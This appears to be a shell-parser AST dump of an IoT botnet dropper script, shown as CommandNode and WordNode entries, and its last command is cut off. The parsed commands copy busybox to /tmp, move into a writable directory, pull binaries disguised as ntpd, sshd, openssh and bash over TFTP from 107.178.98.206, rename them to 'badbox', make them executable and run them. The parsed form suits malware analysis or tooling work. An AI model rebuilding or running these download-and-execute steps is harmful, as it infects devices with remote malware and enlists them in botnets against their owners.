CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 171), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 134), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 116), word='ntpd'),
    WordNode(lineno=4, pos=(117, 119), word='-g'),
    WordNode(lineno=4, pos=(120, 134), word='107.178.98.206'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(134, 135)),
  CommandNode(lineno=4, pos=(135, 151), parts=[
    WordNode(lineno=4, pos=(135, 138), word='cat'),
    WordNode(lineno=4, pos=(139, 143), word='ntpd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(145, 151), word='badbox'), pos=(144, 151), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(151, 152)),
  CommandNode(lineno=4, pos=(152, 162), parts=[
    WordNode(lineno=4, pos=(152, 157), word='chmod'),
    WordNode(lineno=4, pos=(158, 160), word='+x'),
    WordNode(lineno=4, pos=(161, 162), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(162, 163)),
  CommandNode(lineno=4, pos=(163, 171), parts=[
    WordNode(lineno=4, pos=(163, 171), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(172, 294), parts=[
  CommandNode(lineno=5, pos=(172, 179), parts=[
    WordNode(lineno=5, pos=(172, 174), word='cd'),
    WordNode(lineno=5, pos=(175, 179), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(180, 182)),
  CommandNode(lineno=5, pos=(183, 194), parts=[
    WordNode(lineno=5, pos=(183, 185), word='cd'),
    WordNode(lineno=5, pos=(186, 194), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(195, 197)),
  CommandNode(lineno=5, pos=(198, 205), parts=[
    WordNode(lineno=5, pos=(198, 200), word='cd'),
    WordNode(lineno=5, pos=(201, 205), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(206, 208)),
  CommandNode(lineno=5, pos=(209, 217), parts=[
    WordNode(lineno=5, pos=(209, 211), word='cd'),
    WordNode(lineno=5, pos=(212, 217), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(218, 220)),
  CommandNode(lineno=5, pos=(221, 225), parts=[
    WordNode(lineno=5, pos=(221, 223), word='cd'),
    WordNode(lineno=5, pos=(224, 225), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(225, 226)),
  CommandNode(lineno=5, pos=(227, 257), parts=[
    WordNode(lineno=5, pos=(227, 231), word='tftp'),
    WordNode(lineno=5, pos=(232, 234), word='-r'),
    WordNode(lineno=5, pos=(235, 239), word='sshd'),
    WordNode(lineno=5, pos=(240, 242), word='-g'),
    WordNode(lineno=5, pos=(243, 257), word='107.178.98.206'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(257, 258)),
  CommandNode(lineno=5, pos=(258, 274), parts=[
    WordNode(lineno=5, pos=(258, 261), word='cat'),
    WordNode(lineno=5, pos=(262, 266), word='sshd'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(268, 274), word='badbox'), pos=(267, 274), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(274, 275)),
  CommandNode(lineno=5, pos=(275, 285), parts=[
    WordNode(lineno=5, pos=(275, 280), word='chmod'),
    WordNode(lineno=5, pos=(281, 283), word='+x'),
    WordNode(lineno=5, pos=(284, 285), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(285, 286)),
  CommandNode(lineno=5, pos=(286, 294), parts=[
    WordNode(lineno=5, pos=(286, 294), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(295, 423), parts=[
  CommandNode(lineno=6, pos=(295, 302), parts=[
    WordNode(lineno=6, pos=(295, 297), word='cd'),
    WordNode(lineno=6, pos=(298, 302), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(303, 305)),
  CommandNode(lineno=6, pos=(306, 317), parts=[
    WordNode(lineno=6, pos=(306, 308), word='cd'),
    WordNode(lineno=6, pos=(309, 317), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(318, 320)),
  CommandNode(lineno=6, pos=(321, 328), parts=[
    WordNode(lineno=6, pos=(321, 323), word='cd'),
    WordNode(lineno=6, pos=(324, 328), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(329, 331)),
  CommandNode(lineno=6, pos=(332, 340), parts=[
    WordNode(lineno=6, pos=(332, 334), word='cd'),
    WordNode(lineno=6, pos=(335, 340), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(341, 343)),
  CommandNode(lineno=6, pos=(344, 348), parts=[
    WordNode(lineno=6, pos=(344, 346), word='cd'),
    WordNode(lineno=6, pos=(347, 348), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(348, 349)),
  CommandNode(lineno=6, pos=(350, 383), parts=[
    WordNode(lineno=6, pos=(350, 354), word='tftp'),
    WordNode(lineno=6, pos=(355, 357), word='-r'),
    WordNode(lineno=6, pos=(358, 365), word='openssh'),
    WordNode(lineno=6, pos=(366, 368), word='-g'),
    WordNode(lineno=6, pos=(369, 383), word='107.178.98.206'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(383, 384)),
  CommandNode(lineno=6, pos=(384, 403), parts=[
    WordNode(lineno=6, pos=(384, 387), word='cat'),
    WordNode(lineno=6, pos=(388, 395), word='openssh'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(397, 403), word='badbox'), pos=(396, 403), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(403, 404)),
  CommandNode(lineno=6, pos=(404, 414), parts=[
    WordNode(lineno=6, pos=(404, 409), word='chmod'),
    WordNode(lineno=6, pos=(410, 412), word='+x'),
    WordNode(lineno=6, pos=(413, 414), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(414, 415)),
  CommandNode(lineno=6, pos=(415, 423), parts=[
    WordNode(lineno=6, pos=(415, 423), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(424, 512), parts=[
  CommandNode(lineno=7, pos=(424, 431), parts=[
    WordNode(lineno=7, pos=(424, 426), word='cd'),
    WordNode(lineno=7, pos=(427, 431), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(432, 434)),
  CommandNode(lineno=7, pos=(435, 446), parts=[
    WordNode(lineno=7, pos=(435, 437), word='cd'),
    WordNode(lineno=7, pos=(438, 446), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(447, 449)),
  CommandNode(lineno=7, pos=(450, 457), parts=[
    WordNode(lineno=7, pos=(450, 452), word='cd'),
    WordNode(lineno=7, pos=(453, 457), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(458, 460)),
  CommandNode(lineno=7, pos=(461, 469), parts=[
    WordNode(lineno=7, pos=(461, 463), word='cd'),
    WordNode(lineno=7, pos=(464, 469), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(470, 472)),
  CommandNode(lineno=7, pos=(473, 477), parts=[
    WordNode(lineno=7, pos=(473, 475), word='cd'),
    WordNode(lineno=7, pos=(476, 477), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(477, 478)),
  CommandNode(lineno=7, pos=(479, 509), parts=[
    WordNode(lineno=7, pos=(479, 483), word='tftp'),
    WordNode(lineno=7, pos=(484, 486), word='-r'),
    WordNode(lineno=7, pos=(487, 491), word='bash'),
    WordNode(lineno=7, pos=(492, 494), word='-g'),
    WordNode(lineno=7, pos=(495, 509), word='107.178.98.206'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(509, 510)),
  CommandNode(lineno=7, pos=(510, 512), parts=[
    WordNode(lineno=7, pos=(510, 512), word='ca'),
  ]),
])
